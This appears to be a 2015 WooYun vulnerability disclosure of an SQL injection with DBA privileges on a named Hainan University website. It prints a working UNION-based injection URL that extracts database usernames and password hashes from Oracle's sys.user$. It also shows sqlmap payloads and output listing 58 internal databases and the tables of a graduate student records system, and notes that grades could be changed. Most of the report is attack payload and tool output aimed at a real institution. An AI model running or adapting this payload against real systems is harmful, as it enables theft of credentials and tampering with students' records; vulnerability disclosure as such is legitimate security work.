Vulnerability summary
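Vulnerability title: SQL injection on a Hainan University site, DBA privileges
Submitted: 2015-01-08 10:09
Fixed: 2015-01-13 10:10
Made public: 2015-01-13 10:10
Vulnerability type: SQL injection
Severity: Medium
Self-assessed Rank: 5
Vulnerability status: Handed over to a third-party partner organization (CCERT, the education network emergency response team) for handling
Tags:
None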
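Vulnerability details
Disclosure status:
2015-01-08: Details have been sent to the vendor; waiting for the vendor to handle them
2015-01-13: The vendor has actively ignored the vulnerability; details are disclosed to the public
Brief description: DBA privileges. The databases of the school's internal systems all seem to be on this server (50+ databases); looking up student records, changing grades and so on are all possible.
Detailed description: Heh.
http://bszs.hainu.edu.cn/readDetail.aspx?id=-1361' UNION ALL SELECT null,(select wm_concat(name||'~~ '||password||'<br> ') from sys.user$),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
Proof of vulnerability:
http://bszs.hainu.edu.cn/readDetail.aspx?id=-1361' UNION ALL SELECT null,(select wm_concat(name||'~~ '||password||'<br> ') from sys.user$),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--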
Parameter: id
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-1361' UNION ALL SELECT NULL,CHR(113)||CHR(107)||CHR(104)||CHR(98)||CHR(113)||CHR(79)||CHR(113)||CHR(82)||CHR(98)||CHR(79)||CHR(89)||CHR(120)||CHR(65)||CHR(110)||CHR(117)||CHR(113)||CHR(109)||CHR(99)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
available databases [58]:
[*] BSYJSZSXT
[*] CBMS
[*] CTXSYS
[*] DBBAK
[*] DBSNMP
[*] DMSYS
[*] DYYMZXT
[*] EXFSYS
[*] HNDXHRM
[*] HNDXZFDXC
[*] HNDZHDC
[*] HRM2ADMIN
[*] HSBSYJSZSXT
[*] JCZX
[*] JWCXXT
[*] JWSEARCH
[*] LSK_ZFXFZB
[*] LXXT
[*] MDSYS
[*] MHXT
[*] OA
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PORTAL
[*] SCOTT
[*] SFXT
[*] STKSCXT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSGZZLX
[*] TSMSYS
[*] TYMHDLXT
[*] VERIFY
[*] WMSYS
[*] WNMS
[*] XDB
[*] XGXT
[*] XSGZGL
[*] YJSJW
[*] YJSJWGL
[*] YJSJWXT
[*] YJSLQXXBDY
[*] YJSTEST
[*] YJSXT
[*] YXXT
[*] ZFDXC
[*] ZFDXCTEST
[*] ZFIM
[*] ZFIMN
[*] ZFOA
[*] ZFSEARCH
[*] ZFSMP
[*] ZFSOFT_ZFIM
[*] ZFSOFT_ZFSMP
[*] ZFSOFT_ZFSNS
[*] ZFXFZB

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: Generic UNION query (NULL) - 15 columns
    Payload: id=-1361' UNION ALL SELECT NULL,CHR(113)||CHR(107)||CHR(104)||CHR(98)||CHR(113)||CHR(79)||CHR(113)||CHR(82)||CHR(98)||CHR(79)||CHR(89)||CHR(120)||CHR(65)||CHR(110)||CHR(117)||CHR(113)||CHR(109)||CHR(99)||CHR(107)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Oracle
Database: YJSJWXT
[403 tables]
+-----------------------+
| 2006XSJBXXB           |
| BDJZQKB               |
| BJDMB                 |
| BJGMDB                |
| BJPXXB                |
| BKLBDMB               |
| BKSJB                 |
| BSS2009               |
| BSSXX2009             |
| BSWBJBXXB             |
| BSWBZPB               |
| BYSFZXXB              |
| BYSXSJBXXB            |
| BYYQBZB               |
| CDDMB                 |
| CFLXDMB               |
| CJB                   |
| CJDBWYHCYXXB          |
........ .......
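Remediation:
Copyright notice: when reposting, please credit the source: 路人N @WooYun
Vulnerability response
Vendor response:
Severity: No impact; ignored by vendor
Ignored at: 2015-01-13 10:10
Vendor reply:
Latest status: None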